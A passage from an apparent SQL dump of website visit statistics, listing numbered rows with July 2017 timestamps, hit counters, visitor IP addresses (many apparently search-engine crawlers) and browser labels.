029,1499373418,2,2,0,0,'216.244.66.246','other'),(130030,1499373471,1,1,0,0,'157.55.39.178','other'),(130031,1499373668,1,1,0,0,'217.182.132.180','other'),(130032,1499374103,2,2,0,0,'95.108.179.15','other'),(130033,1499374192,1,1,0,0,'217.182.132.56','other'),(130034,1499374341,1,1,0,0,'185.137.19.243','chrome'),(130035,1499374493,1,1,0,0,'137.74.207.120','other'),(130036,1499374555,1,1,0,0,'95.108.213.34','other'),(130037,1499374635,1,1,0,0,'66.249.76.109','chrome'),(130038,1499375828,1,1,0,0,'87.250.224.18','other'),(130039,1499375897,1,0,1,0,'66.249.76.108',''),(130040,1499376494,1,1,0,0,'157.55.39.178','other'),(130041,1499376632,1,1,0,0,'217.182.132.180','other'),(130042,1499376655,1,1,0,0,'95.108.213.34','other'),(130043,1499377159,1,0,1,0,'66.249.76.91',''),(130044,1499377900,1,1,0,0,'217.182.132.15','other'),(130045,1499377974,1,1,0,0,'51.255.65.96','other'),(130046,1499378831,1,1,0,0,'217.182.132.154','other'),(130047,1499378892,2,2,0,0,'66.249.76.109','chrome'),(130048,1499379449,1,1,0,0,'66.249.76.91','chrome'),(130049,1499379697,1,0,1,0,'66.249.76.108',''),(130050,1499379840,1,1,0,0,'8.29.198.27','other'),(130051,1499380109,1,1,0,0,'217.182.132.241','other'),(130052,1499380416,1,0,1,0,'66.249.76.93',''),(130053,1499380465,1,1,0,0,'66.249.76.108','chrome'),(130054,1499380678,1,1,0,0,'66.249.76.93','chrome'),(130055,1499380785,2,1,1,0,'66.249.76.89',''),(130056,1499380883,2,2,0,0,'216.244.66.194','other'),(130057,1499380987,1,1,0,0,'198.204.253.58','msie'),(130058,1499381417,1,1,0,0,'217.69.133.4','other'),(130059,1499381434,1,1,0,0,'217.69.133.2','other'),(130060,1499381446,2,2,0,0,'217.69.133.6','other'),(130061,1499381494,1,1,0,0,'217.69.133.5','other'),(130062,1499381596,1,1,0,0,'66.249.66.75','chrome'),(130063,1499381624,1,1,0,0,'66.249.76.107','chrome'),(130064,1499382452,1,1,0,0,'216.244.66.246','other'),(130065,1499382811,2,0,2,0,'66.249.76.107',''),(130066,1499382819,1,1,0,0,'51.255.65.7','other'),(130067,1499382875,1,0,1,0,'66.249.76.91',''),(130068,1499382904,1,0,1,0,'66.249.66.74',''),(130069,1499383038,1,1,0,0,'95.108.213.34','other'),(130070,1499383222,1,1,0,0,'51.255.65.31','other'),(130071,1499383437,1,1,0,0,'141.8.142.154','other'),(130072,1499384284,1,0,1,0,'66.249.66.75',''),(130073,1499384512,1,1,0,0,'180.76.15.15','other'),(130074,1499385554,1,1,0,0,'51.255.65.54','other'),(130075,1499385826,1,1,0,0,'95.108.213.34','other'),(130076,1499386267,1,0,1,0,'66.249.76.89',''),(130077,1499386360,1,1,0,0,'217.182.132.83','other'),(130078,1499387327,1,1,0,0,'217.69.133.9','other'),(130079,1499387350,1,1,0,0,'217.69.133.3','other'),(130080,1499388354,2,2,0,0,'216.244.66.194','other'),(130081,1499388780,1,1,0,0,'217.182.132.31','other'),(130082,1499388956,1,1,0,0,'217.182.132.67','other'),(130083,1499389284,1,0,1,0,'68.180.230.48',''),(130084,1499389287,1,1,0,0,'51.255.71.121','other'),(130085,1499389358,1,1,0,0,'164.132.162.154','other'),(130086,1499389605,1,1,0,0,'180.76.15.161','other'),(130087,1499390293,1,0,1,0,'66.249.66.74',''),(130088,1499390299,2,0,2,0,'66.249.76.91',''),(130089,1499390401,1,1,0,0,'217.182.132.171','other'),(130090,1499390433,1,1,0,0,'51.255.71.131','other'),(130091,1499390472,3,0,3,0,'66.249.76.93',''),(130092,1499390479,1,1,0,0,'95.108.213.34','other'),(130093,1499390485,1,0,1,0,'66.249.66.75',''),(130094,1499390678,1,1,0,0,'8.29.198.25','other'),(130095,1499391029,1,1,0,0,'141.8.142.154','other'),(130096,1499391316,1,0,1,0,'66.249.76.91',''),(130097,1499391614,1,1,0,0,'66.249.76.89','chrome'),(130098,1499391735,1,0,1,0,'66.249.76.109',''),(130099,1499391785,1,0,1,0,'66.249.76.108',''),(130100,1499392363,1,1,0,0,'216.244.66.246','other'),(130101,1499392919,1,1,0,0,'51.255.71.126','other'),(130102,1499393021,1,1,0,0,'66.102.9.29','chrome'),(130103,1499393030,1,1,0,0,'217.69.133.9','other'),(130104,1499393136,1,1,0,0,'216.244.66.237','other'),(130105,1499393506,1,1,0,0,'66.249.76.91','chrome'),(130106,1499393588,1,1,0,0,'51.255.65.60','other'),(130107,1499394040,1,1,0,0,'217.182.132.84','other'),(130108,1499394201,1,1,0,0,'217.182.132.18','other'),(130109,1499394564,1,1,0,0,'217.182.132.178','other'),(130110,1499395360,1,0,1,0,'66.249.76.108',''),(130111,1499395583,1,1,0,0,'51.255.65.60','other'),(130112,1499395639,1,0,1,0,'66.249.66.76',''),(130113,1499395798,1,1,0,0,'216.244.66.246','other'),(130114,1499395838,1,0,1,0,'66.249.76.89',''),(130115,1499395873,1,0,1,0,'66.249.76.93',''),(130116,1499396035,1,1,0,0,'51.255.65.75','other'),(130117,1499396200,1,1,0,0,'66.249.76.108','chrome'),(130118,1499396209,1,1,0,0,'185.26.180.168','other'),(130119,1499396457,1,1,0,0,'141.8.142.154','other'),(130120,1499397245,1,1,0,0,'164.132.162.157','other'),(130121,1499397260,1,0,1,0,'66.249.76.93',''),(130122,1499398301,1,1,0,0,'217.182.132.193','other'),(130123,1499398336,1,1,0,0,'51.255.65.37','other'),(130124,1499398357,1,1,0,0,'217.182.132.53','other'),(130125,1499398685,1,1,0,0,'51.255.65.61','other'),(130126,1499398708,1,1,0,0,'51.255.71.126','other'),(130127,1499398816,1,1,0,0,'51.255.65.82','other'),(130128,1499399347,1,0,1,0,'66.249.76.93',''),(130129,1499399394,1,1,0,0,'217.182.132.25','other'),(130130,1499399496,1,1,0,0,'66.249.66.157','chrome'),(130131,1499400579,2,2,0,0,'95.108.213.34','other'),(130132,1499400964,1,1,0,0,'217.182.132.19','other'),(130133,1499401118,1,1,0,0,'5.255.253.63','other'),(130134,1499401414,1,1,0,0,'157.55.39.125','other'),(130135,1499401451,1,1,0,0,'137.74.201.108','other'),(130136,1499401506,1,1,0,0,'8.29.198.25','other'),(130137,1499401676,1,0,1,0,'66.249.76.93',''),(130138,1499401822,1,1,0,0,'37.53.228.195','firefox'),(130139,1499401897,1,0,1,0,'66.249.76.91',''),(130140,1499402220,1,1,0,0,'51.255.65.19','other'),(130141,1499402359,1,1,0,0,'91.196.178.71','firefox'),(130142,1499402453,1,1,0,0,'180.76.15.149','other'),(130143,1499402639,1,1,0,0,'51.255.71.113','other'),(130144,1499402789,1,0,1,0,'66.249.76.89',''),(130145,1499402918,1,0,1,0,'66.249.66.75',''),(130146,1499402953,2,2,0,0,'66.249.76.107','chrome'),(130147,1499403097,2,2,0,0,'216.244.66.246','other'),(130148,1499403246,2,1,1,0,'66.249.76.89',''),(130149,1499403307,1,1,0,0,'91.196.178.71','firefox'),(130150,1499404032,1,1,0,0,'66.249.76.108','chrome'),(130151,1499404091,2,2,0,0,'216.244.66.246','other'),(130152,1499404353,1,0,1,0,'66.249.66.75',''),(130153,1499404535,1,1,0,0,'217.69.133.9','other'),(130154,1499404628,1,1,0,0,'217.69.133.4','other'),(130155,1499405064,1,1,0,0,'216.244.66.237','other'),(130156,1499405078,1,1,0,0,'217.182.132.181','other'),(130157,1499405234,1,1,0,0,'66.249.76.91','chrome'),(130158,1499405365,1,1,0,0,'87.250.224.18','other'),(130159,1499405418,1,1,0,0,'93.158.152.77','other'),(130160,1499405495,1,1,0,0,'91.196.178.68','chrome'),(130161,1499405795,1,1,0,0,'157.55.39.178','other'),(130162,1499406105,1,1,0,0,'216.244.66.194','other'),(130163,1499406286,1,1,0,0,'217.182.132.53','other'),(130164,1499406455,1,0,1,0,'66.249.66.76',''),(130165,1499406462,1,1,0,0,'66.249.76.109','chrome'),(130166,1499406624,1,1,0,0,'66.249.76.107','chrome'),(130167,1499407017,1,1,0,0,'51.255.65.55','other'),(130168,1499407627,1,1,0,0,'157.55.39.35','other'),(130169,1499407789,1,0,1,0,'66.249.76.107',''),(130170,1499407906,1,1,0,0,'217.182.132.176','other'),(130171,1499407948,1,1,0,0,'51.255.65.42','other'),(130172,1499408017,1,1,0,0,'51.255.71.112','other'),(130173,1499408175,1,1,0,0,'66.249.76.91','chrome'),(130174,1499408221,1,1,0,0,'51.255.71.129','other'),(130175,1499408601,1,1,0,0,'37.52.22.188','firefox'),(130176,1499408663,1,1,0,0,'185.137.19.133','chrome'),(130177,1499408782,1,1,0,0,'51.255.65.14','other'),(130178,1499408924,1,1,0,0,'51.255.65.53','other'),(130179,1499409227,1,1,0,0,'95.108.213.7','other'),(130180,1499409504,1,1,0,0,'51.255.65.96','other'),(130181,1499409518,1,0,1,0,'66.249.66.155',''),(130182,1499409606,1,1,0,0,'185.137.19.133','chrome'),(130183,1499409782,1,0,1,0,'66.249.76.93',''),(130184,1499409785,4,4,0,0,'216.244.66.246','other'),(130185,1499410075,1,1,0,0,'217.182.132.52','other'),(130186,1499410250,1,1,0,0,'216.244.66.237','other'),(130187,1499410323,1,1,0,0,'217.69.133.3','other'),(130188,1499410850,1,0,1,0,'68.180.230.48',''),(130189,1499410988,1,1,0,0,'51.255.65.38','other'),(130190,1499411031,1,1,0,0,'180.76.15.155','other'),(130191,1499411125,1,1,0,0,'51.255.65.8','other'),(130192,1499411225,1,1,0,0,'66.249.66.156','chrome'),(130193,1499411547,1,0,1,0,'66.249.66.75',''),(130194,1499411580,1,1,0,0,'95.108.213.34','other'),(130195,1499411746,2,2,0,0,'216.244.66.194','other'),(130196,1499411901,1,1,0,0,'91.196.178.68','chrome'),(130197,1499411912,1,1,0,0,'91.196.179.33','firefox'),(130198,1499411932,1,0,1,0,'66.249.76.93',''),(130199,1499412345,1,1,0,0,'8.29.198.26','other'),(130200,1499412679,1,1,0,0,'51.255.71.122','other'),(130201,1499413185,1,1,0,0,'91.124.252.197','chrome'),(130202,1499413554,1,1,0,0,'141.8.132.43','other'),(130203,1499413881,1,1,0,0,'51.255.65.68','other'),(130204,1499414003,1,0,1,0,'66.249.66.155',''),(130205,1499414384,1,1,0,0,'157.55.39.35','other'),(130206,1499414420,1,1,0,0,'178.154.189.21','other'),(130207,1499414503,1,0,1,0,'66.249.76.107',''),(130208,1499414504,1,1,0,0,'82.207.49.150','firefox'),(130209,1499414834,1,1,0,0,'176.31.231.10','other'),(130210,1499414935,1,1,0,0,'51.255.65.50','other'),(130211,1499414978,1,1,0,0,'217.182.132.66','other'),(130212,1499414982,1,1,0,0,'141.8.142.48','other'),(130213,1499415033,1,1,0,0,'185.137.19.133','chrome'),(130214,1499415060,1,1,0,0,'178.154.189.29','other'),(130215,1499415339,1,1,0,0,'217.182.132.183','other'),(130216,1499415878,1,1,0,0,'51.255.65.54','other'),(130217,1499416064,1,1,0,0,'217.69.133.6','other'),(130218,1499416068,1,1,0,0,'217.69.133.5','other'),(130219,1499416069,2,2,0,0,'217.69.133.3','other'),(130220,1499416082,1,1,0,0,'217.69.133.9','other'),(130221,1499416103,1,1,0,0,'217.69.133.4','other'),(130222,1499416114,1,1,0,0,'91.196.178.163','chrome'),(130223,1499416337,1,1,0,0,'78.111.190.43','chrome'),(130224,1499416619,1,1,0,0,'91.233.127.51','chrome'),(130225,1499416768,1,1,0,0,'95.135.208.236','chrome'),(130226,1499417110,1,0,1,0,'66.249.76.91',''),(130227,1499417278,1,1,0,0,'51.255.65.59','other'),(130228,1499417280,1,1,0,0,'51.255.65.9','other'),(130229,1499417454,3,3,0,0,'5.9.149.98','other'),(130230,1499417545,1,1,0,0,'164.132.162.160','other'),(130231,1499417798,7,7,0,0,'144.76.38.73','other'),(130232,1499418006,1,1,0,0,'95.132.18.64','firefox'),(130233,1499418122,1,1,0,0,'51.255.65.27','other'),(130234,1499418314,2,2,0,0,'95.108.213.34','other'),(130235,1499418655,1,1,0,0,'164.132.162.164','other'),(130236,1499419060,1,1,0,0,'66.249.76.109','chrome'),(130237,1499419864,6,6,0,0,'216.244.66.246','other'),(130238,1499419885,1,1,0,0,'178.255.215.94','other'),(130239,1499420027,1,1,0,0,'91.209.11.236','other'),(130240,1499420088,1,1,0,0,'217.182.132.55','other'),(130241,1499420261,1,1,0,0,'217.182.132.171','other'),(130242,1499420556,1,1,0,0,'217.182.132.67','other'),(130243,1499420786,1,1,0,0,'217.182.132.65','other'),(130244,1499421022,1,1,0,0,'217.182.132.80','other'),(130245,1499421074,1,1,0,0,'157.55.39.178','other'),(130246,1499421771,1,1,0,0,'217.69.133.6','other'),(130247,1499422066,1,0,1,0,'66.249.76.89',''),(130248,1499422515,1,1,0,0,'137.74.207.159','other'),(130249,1499422931,1,1,0,0,'51.255.71.123','other'),(130250,1499423043,3,3,0,0,'216.244.66.246','other'),(130251,1499423174,1,1,0,0,'8.29.198.25','other'),(130252,1499423251,1,1,0,0,'51.255.65.91','other'),(130253,1499423423,1,1,0,0,'91.209.11.236','other'),(130254,1499423543,1,1,0,0,'217.182.132.241','other'),(130255,1499423585,1,1,0,0,'217.182.132.37','other'),(130256,1499423657,1,1,0,0,'217.182.132.147','other'),(130257,1499423965,1,1,0,0,'137.74.207.120','other'),(130258,1499423970,1,1,0,0,'217.182.132.19','other'),(130259,1499424440,1,1,0,0,'217.182.132.52','other'),(130260,1499424504,1,1,0,0,'164.132.162.154','other'),(130261,1499424545,1,0,1,0,'66.249.76.107',''),(130262,1499424772,1,0,1,0,'68.180.230.48',''),(130263,1499424849,1,1,0,0,'141.8.142.154','other'),(130264,1499424853,1,1,0,0,'95.108.213.34','other'),(130265,1499425879,1,0,1,0,'68.180.230.48',''),(130266,1499426004,1,1,0,0,'51.255.71.120','other'),(130267,1499426141,1,1,0,0,'217.182.132.146','other'),(130268,1499426610,1,1,0,0,'5.255.253.58','other'),(130269,1499426976,24,24,0,0,'62.138.8.181','other'),(130270,1499427213,1,1,0,0,'141.8.132.25','other'),(130271,1499427493,1,1,0,0,'217.69.133.6','other'),(130272,1499427702,1,1,0,0,'217.182.132.188','other'),(130273,1499428271,1,1,0,0,'216.244.66.194','other'),(130274,1499428338,1,1,0,0,'217.182.132.96','other'),(130275,1499428445,1,1,0,0,'91.196.178.68','chrome'),(130276,1499428558,1,1,0,0,'217.182.132.63','other'),(130277,1499428695,1,1,0,0,'212.26.137.66','chrome'),(130278,1499428797,1,1,0,0,'93.158.152.79','other'),(130279,1499429681,1,0,1,0,'66.249.66.155',''),(130280,1499429795,1,0,1,0,'66.249.76.93',''),(130281,1499429909,1,0,1,0,'66.249.76.89',''),(130282,1499430169,1,1,0,0,'31.43.3.49','chrome'),(130283,1499430187,2,2,0,0,'217.182.132.78','other'),(130284,1499430589,1,1,0,0,'91.196.178.68','chrome'),(130285,1499430770,1,1,0,0,'141.8.142.17','other'),(130286,1499430858,1,1,0,0,'217.182.132.55','other'),(130287,1499430870,1,1,0,0,'178.154.189.16','other'),(130288,1499431159,1,1,0,0,'91.209.11.236','other'),(130289,1499431198,1,0,1,0,'68.180.230.48',''),(130290,1499431474,1,1,0,0,'141.8.142.38','other'),(130291,1499431694,1,0,1,0,'66.249.76.107',''),(130292,1499432162,1,1,0,0,'91.196.178.168','chrome'),(130293,1499432424,1,1,0,0,'51.255.65.66','other'),(130294,1499432591,1,1,0,0,'37.9.113.5','other'),(130295,1499432642,1,1,0,0,'51.255.65.15','other'),(130296,1499433061,1,1,0,0,'164.132.162.155','other'),(130297,1499433220,1,1,0,0,'217.69.133.4','other'),(130298,1499433222,1,1,0,0,'217.69.133.9','other'),(130299,1499433420,1,1,0,0,'91.196.178.66','chrome'),(130300,1499433441,1,1,0,0,'157.55.39.178','other'),(130301,1499433637,1,1,0,0,'51.255.65.82','other'),(130302,1499433951,1,0,1,0,'66.249.66.157',''),(130303,1499434009,1,1,0,0,'8.29.198.26','other'),(130304,1499434628,1,1,0,0,'51.255.71.130','other'),(130305,1499435245,1,1,0,0,'66.249.66.157','chrome'),(130306,1499435706,1,1,0,0,'51.255.65.19','other'),(130307,1499435743,1,1,0,0,'216.244.66.194','other'),(130308,1499435915,1,1,0,0,'178.154.200.37','other'),(130309,1499436170,1,1,0,0,'51.255.65.36','other'),(130310,1499436253,1,1,0,0,'91.196.177.15','chrome'),(130311,1499436682,1,1,0,0,'87.250.224.18','other'),(130312,1499436805,1,1,0,0,'141.8.142.42','other'),(130313,1499436837,1,1,0,0,'217.182.132.187','other'),(130314,1499436986,1,1,0,0,'217.182.132.176','other'),(130315,1499437240,1,1,0,0,'178.154.200.64','other'),(130316,1499437680,1,1,0,0,'217.182.132.96','other'),(130317,1499437894,1,1,0,0,'51.255.65.2','other'),(130318,1499438003,1,1,0,0,'137.74.207.119','other'),(130319,1499438322,1,1,0,0,'217.182.132.81','other'),(130320,1499438433,1,1,0,0,'82.145.221.193','chrome'),(130321,1499438497,1,1,0,0,'51.255.65.7','other'),(130322,1499438753,1,1,0,0,'217.182.132.60','other'),(130323,1499439012,1,1,0,0,'217.69.133.194','other'),(130324,1499439019,1,1,0,0,'217.69.133.3','other'),(130325,1499439031,1,1,0,0,'217.69.133.203','other'),(130326,1499439207,1,1,0,0,'217.182.132.187','other'),(130327,1499439939,1,1,0,0,'51.255.65.63','other'),(130328,1499440104,1,1,0,0,'51.255.65.67','other'),(130329,1499440445,1,1,0,0,'51.255.65.92','other'),(130330,1499440858,1,1,0,0,'51.255.65.20','other'),(130331,1499440920,1,1,0,0,'54.227.137.138','chrome'),(130332,1499441093,1,1,0,0,'141.8.142.38','other'),(130333,1499441482,1,1,0,0,'157.55.39.35','other'),(130334,1499441801,1,1,0,0,'51.255.65.36','other'),(130335,1499441941,4,4,0,0,'216.244.66.246','other'),(130336,1499442198,1,1,0,0,'51.255.65.64','other'),(130337,1499442917,1,1,0,0,'164.132.162.156','other'),(130338,1499443344,1,1,0,0,'217.182.132.87','other'),(130339,1499443367,1,1,0,0,'164.132.162.159','other'),(130340,1499443467,1,1,0,0,'51.255.65.49','other'),(130341,1499444367,1,1,0,0,'51.255.71.122','other'),(130342,1499444404,1,1,0,0,'217.182.132.75','other'),(130343,1499444464,2,2,0,0,'95.108.181.13','other'),(130344,1499444493,1,0,1,0,'66.249.66.157',''),(130345,1499444502,1,1,0,0,'66.249.76.93','chrome'),(130346,1499444722,1,1,0,0,'217.69.133.2','other'),(130347,1499444744,1,1,0,0,'217.69.133.6','other'),(130348,1499444747,1,1,0,0,'217.69.133.194','other'),(130349,1499444773,1,1,0,0,'51.255.71.98','other'),(130350,1499444845,1,1,0,0,'8.29.198.27','other'),(130351,1499444949,1,0,1,0,'66.249.66.76',''),(130352,1499445341,1,1,0,0,'164.132.162.187','other'),(130353,1499445859,1,1,0,0,'178.92.170.231','chrome'),(130354,1499446072,1,1,0,0,'95.108.179.8','other'),(130355,1499446075,1,1,0,0,'37.9.113.43','other'),(130356,1499446121,1,1,0,0,'137.74.207.161','other'),(130357,1499446176,2,2,0,0,'216.244.66.194','other'),(130358,1499446235,1,1,0,0,'93.158.152.60','other'),(130359,1499446345,1,0,1,0,'66.249.76.89',''),(130360,1499446411,1,1,0,0,'51.255.65.59','other'),(130361,1499446486,1,0,1,0,'66.249.66.75',''),(130362,1499446607,1,1,0,0,'51.255.65.92','other'),(130363,1499446671,1,0,1,0,'66.249.66.74',''),(130364,1499446711,1,1,0,0,'95.84.138.71','msie'),(130365,1499447020,1,1,0,0,'217.182.132.156','other'),(130366,1499447496,1,0,1,0,'68.180.230.48',''),(130367,1499447670,1,1,0,0,'178.154.200.37','other'),(130368,1499447695,1,1,0,0,'51.255.65.17','other'),(130369,1499448458,1,1,0,0,'137.74.207.102','other'),(130370,1499449483,1,1,0,0,'66.102.9.25','chrome'),(130371,1499449760,1,1,0,0,'51.255.65.90','other'),(130372,1499449848,1,0,1,0,'66.249.76.107',''),(130373,1499449918,1,1,0,0,'66.249.76.108','chrome'),(130374,1499450100,1,1,0,0,'95.132.40.112','firefox'),(130375,1499450491,1,1,0,0,'217.182.132.93','other'),(130376,1499450497,1,1,0,0,'217.69.133.9','other'),(130377,1499450501,1,1,0,0,'217.69.133.4','other'),(130378,1499450896,1,0,1,0,'68.180.230.48',''),(130379,1499450904,2,2,0,0,'216.244.66.246','other'),(130380,1499450918,1,1,0,0,'217.182.132.63','other'),(130381,1499451031,1,1,0,0,'217.182.132.55','other'),(130382,1499451195,1,1,0,0,'51.255.65.72','other'),(130383,1499451220,1,1,0,0,'91.209.11.236','other'),(130384,1499451504,1,1,0,0,'51.255.65.76','other'),(130385,1499451805,1,1,0,0,'51.255.65.43','other'),(130386,1499452058,1,1,0,0,'95.132.40.112','firefox'),(130387,1499452158,1,1,0,0,'51.255.65.77','other'),(130388,1499452185,1,1,0,0,'51.255.65.95','other'),(130389,1499452186,1,1,0,0,'217.182.132.17','other'),(130390,1499452443,1,0,1,0,'66.249.66.76',''),(130391,1499452604,1,1,0,0,'51.255.65.4','other'),(130392,1499452833,1,1,0,0,'51.255.71.116','other'),(130393,1499453017,1,1,0,0,'51.255.65.90','other'),(130394,1499453274,1,0,1,0,'66.249.76.89',''),(130395,1499453504,1,1,0,0,'51.255.65.89','other'),(130396,1499453904,1,1,0,0,'51.255.65.58','other'),(130397,1499454168,2,2,0,0,'216.244.66.246','other'),(130398,1499454746,1,1,0,0,'37.73.200.132','chrome'),(130399,1499454995,1,1,0,0,'217.182.132.151','other'),(130400,1499455180,1,0,1,0,'66.249.76.93',''),(130401,1499455407,1,0,1,0,'66.249.66.76',''),(130402,1499455409,1,1,0,0,'51.255.65.11','other'),(130403,1499455656,1,1,0,0,'137.74.207.119','other'),(130404,1499455678,1,1,0,0,'8.29.198.27','other'),(130405,1499455739,1,1,0,0,'217.182.132.90','other'),(130406,1499455795,1,1,0,0,'91.196.178.162','chrome'),(130407,1499455814,1,0,1,0,'68.180.230.48',''),(130408,1499456224,1,1,0,0,'217.69.133.2','other'),(130409,1499456236,1,1,0,0,'217.69.133.203','other'),(130410,1499456529,1,1,0,0,'66.249.76.93','chrome'),(130411,1499456620,1,1,0,0,'51.255.71.131','other'),(130412,1499456646,1,1,0,0,'217.182.132.88','other'),(130413,1499457192,1,1,0,0,'93.193.135.90','other'),(130414,1499457348,1,1,0,0,'51.255.65.76','other'),(130415,1499457366,1,1,0,0,'164.132.162.156','other'),(130416,1499457637,1,0,1,0,'68.180.230.48',''),(130417,1499457875,1,1,0,0,'66.249.76.108','chrome'),(130418,1499458447,1,0,1,0,'66.249.76.109',''),(130419,1499458927,1,1,0,0,'95.108.213.32','other'),(130420,1499459067,1,1,0,0,'178.154.149.1','other'),(130421,1499459088,1,1,0,0,'217.182.132.177','other'),(130422,1499459222,1,1,0,0,'217.182.132.95','other'),(130423,1499459231,1,1,0,0,'51.255.65.33','other'),(130424,1499460074,1,0,1,0,'66.249.76.108',''),(130425,1499460845,1,1,0,0,'217.182.132.6','other'),(130426,1499461822,4,4,0,0,'216.244.66.246','other'),(130427,1499462408,1,1,0,0,'217.182.132.188','other'),(130428,1499462433,1,0,1,0,'66.249.76.93',''),(130429,1499463354,1,1,0,0,'217.182.132.153','other'),(130430,1499463378,1,0,1,0,'68.180.231.23',''),(130431,1499463426,2,2,0,0,'91.209.11.236','other'),(130432,1499463427,1,1,0,0,'51.255.71.113','other'),(130433,1499463826,1,1,0,0,'95.108.181.13','other'),(130434,1499464159,1,1,0,0,'217.182.132.150','other'),(130435,1499464921,1,1,0,0,'141.8.132.39','other'),(130436,1499465900,3,3,0,0,'216.244.66.194','other'),(130437,1499466225,4,4,0,0,'88.198.0.163','other'),(130438,1499466507,1,1,0,0,'8.29.198.27','other'),(130439,1499466948,1,1,0,0,'217.182.132.59','other'),(130440,1499467651,1,1,0,0,'217.69.133.5','other'),(130441,1499467763,1,1,0,0,'217.69.133.203','other'),(130442,1499467811,1,0,1,0,'66.249.76.89',''),(130443,1499468247,1,1,0,0,'178.154.200.45','other'),(130444,1499468367,1,1,0,0,'157.55.39.125','other'),(130445,1499469301,1,0,1,0,'66.249.66.156',''),(130446,1499469564,1,1,0,0,'66.249.76.109','chrome'),(130447,1499469937,1,1,0,0,'178.154.149.3','other'),(130448,1499470080,1,1,0,0,'51.255.65.65','other'),(130449,1499470129,1,1,0,0,'216.244.66.194','other'),(130450,1499470390,1,1,0,0,'51.255.71.131','other'),(130451,1499470449,1,1,0,0,'51.255.65.4','other'),(130452,1499471061,1,1,0,0,'217.182.132.192','other'),(130453,1499471140,3,3,0,0,'216.244.66.246','other'),(130454,1499471141,2,0,2,0,'66.249.76.93',''),(130455,1499471303,1,1,0,0,'5.1.27.31','chrome'),(130456,1499473025,1,1,0,0,'66.249.66.76','chrome'),(130457,1499473222,1,1,0,0,'66.249.76.109','chrome'),(130458,1499473223,1,1,0,0,'217.182.132.149','other'),(130459,1499473260,1,1,0,0,'51.255.65.22','other'),(130460,1499473613,1,1,0,0,'46.161.9.55','chrome'),(130461,1499473682,1,0,1,0,'66.249.76.91',''),(130462,1499473700,1,1,0,0,'217.182.132.68','other'),(130463,1499474015,1,1,0,0,'51.255.65.81','other'),(130464,1499474956,2,2,0,0,'216.244.66.246','other'),(130465,1499475225,1,0,1,0,'68.180.230.48',''),(130466,1499475395,1,1,0,0,'217.182.132.91','other'),(130467,1499476013,1,1,0,0,'51.255.65.94','other'),(130468,1499476356,6,6,0,0,'216.244.66.194','other'),(130469,1499476577,1,1,0,0,'217.182.132.20','other'),(130470,1499476626,1,1,0,0,'157.55.39.35','other'),(130471,1499476854,1,1,0,0,'51.255.71.121','other'),(130472,1499477335,1,1,0,0,'8.29.198.26','other'),(130473,1499477577,1,1,0,0,'95.108.213.34','other'),(130474,1499477744,1,1,0,0,'216.244.66.194','other'),(130475,1499477797,1,1,0,0,'51.255.65.72','other'),(130476,1499477897,1,1,0,0,'5.255.253.63','other'),(130477,1499477950,1,1,0,0,'178.154.200.2','other'),(130478,1499478657,1,0,1,0,'66.249.66.76',''),(130479,1499479018,1,1,0,0,'217.182.132.154','other'),(130480,1499479118,1,1,0,0,'51.255.65.53','other'),(130481,1499479137,1,1,0,0,'217.69.133.203','other'),(130482,1499479161,1,0,1,0,'66.249.76.93',''),(130483,1499479260,1,0,1,0,'66.249.76.108',''),(130484,1499479465,1,1,0,0,'87.250.224.16','other'),(130485,1499479766,1,1,0,0,'51.255.65.41','other'),(130486,1499480339,1,1,0,0,'137.74.201.100','other'),(130487,1499481063,1,1,0,0,'217.182.132.241','other'),(130488,1499481167,1,1,0,0,'216.244.66.246','other'),(130489,1499481211,1,1,0,0,'137.74.207.170','other'),(130490,1499481542,1,1,0,0,'217.182.132.55','other'),(130491,1499482366,1,1,0,0,'217.182.132.59','other'),(130492,1499482750,1,1,0,0,'137.74.201.108','other'),(130493,1499482845,1,1,0,0,'51.255.65.94','other'),(130494,1499483238,1,1,0,0,'51.255.65.38','other'),(130495,1499483913,2,0,2,0,'66.249.76.89',''),(130496,1499484220,1,1,0,0,'95.108.213.34','other'),(130497,1499484674,1,1,0,0,'216.244.66.246','other'),(130498,1499484713,1,1,0,0,'217.69.133.194','other'),(130499,1499484774,1,1,0,0,'142.54.174.130','msie'),(130500,1499484782,1,1,0,0,'157.55.39.178','other'),(130501,1499485994,1,1,0,0,'95.108.179.15','other'),(130502,1499486060,1,1,0,0,'216.244.66.237','other'),(130503,1499486136,1,1,0,0,'51.255.65.61','other'),(130504,1499487177,1,1,0,0,'217.182.132.82','other'),(130505,1499488166,1,1,0,0,'8.29.198.26','other'),(130506,1499488582,1,1,0,0,'51.255.65.77','other'),(130507,1499489180,1,1,0,0,'195.154.251.162','chrome'),(130508,1499489312,1,1,0,0,'217.182.132.75','other'),(130509,1499489343,1,0,1,0,'66.249.66.74',''),(130510,1499489567,1,1,0,0,'217.182.132.90','other'),(130511,1499490354,2,2,0,0,'217.69.133.4','other'),(130512,1499490554,2,2,0,0,'217.69.133.5','other'),(130513,1499490563,1,1,0,0,'217.69.133.2','other'),(130514,1499491552,3,3,0,0,'95.108.213.34','other'),(130515,1499492774,1,1,0,0,'51.255.65.44','other'),(130516,1499493040,1,1,0,0,'217.182.132.51','other'),(130517,1499493431,2,0,2,0,'66.249.76.93',''),(130518,1499493581,1,1,0,0,'157.55.39.178','other'),(130519,1499493684,1,1,0,0,'51.255.65.63','other'),(130520,1499493858,1,1,0,0,'95.108.179.15','other'),(130521,1499493889,1,1,0,0,'164.132.162.164','other'),(130522,1499494708,1,1,0,0,'164.132.162.159','other'),(130523,1499494713,1,1,0,0,'137.74.207.116','other'),(130524,1499495005,1,1,0,0,'95.108.213.34','other'),(130525,1499495276,1,1,0,0,'51.255.65.79','other'),(130526,1499495600,1,0,1,0,'66.249.76.109',''),(130527,1499495668,1,1,0,0,'51.255.65.85','other'),(130528,1499496028,1,1,0,0,'180.76.15.135','other'),(130529,1499496102,1,1,0,0,'51.255.65.34','other'),(130530,1499496250,1,1,0,0,'217.69.133.4','other'),(130531,1499496360,1,1,0,0,'51.255.71.116','other'),(130532,1499496638,1,1,0,0,'95.108.213.34','other'),(130533,1499496719,45,45,0,0,'136.243.68.226','other'),(130534,1499497199,1,1,0,0,'217.182.132.70','other'),(130535,1499497293,1,1,0,0,'217.182.132.6','other'),(130536,1499497540,1,1,0,0,'137.74.207.120','other'),(130537,1499497763,1,1,0,0,'51.255.65.76','other'),(130538,1499497803,2,2,0,0,'216.244.66.194','other'),(130539,1499498090,1,1,0,0,'217.182.132.188','other'),(130540,1499498730,1,1,0,0,'51.255.65.41','other'),(130541,1499499002,1,1,0,0,'8.29.198.26','other'),(130542,1499499754,1,1,0,0,'95.108.213.34','other'),(130543,1499499885,1,1,0,0,'217.182.132.184','other'),(130544,1499499898,1,1,0,0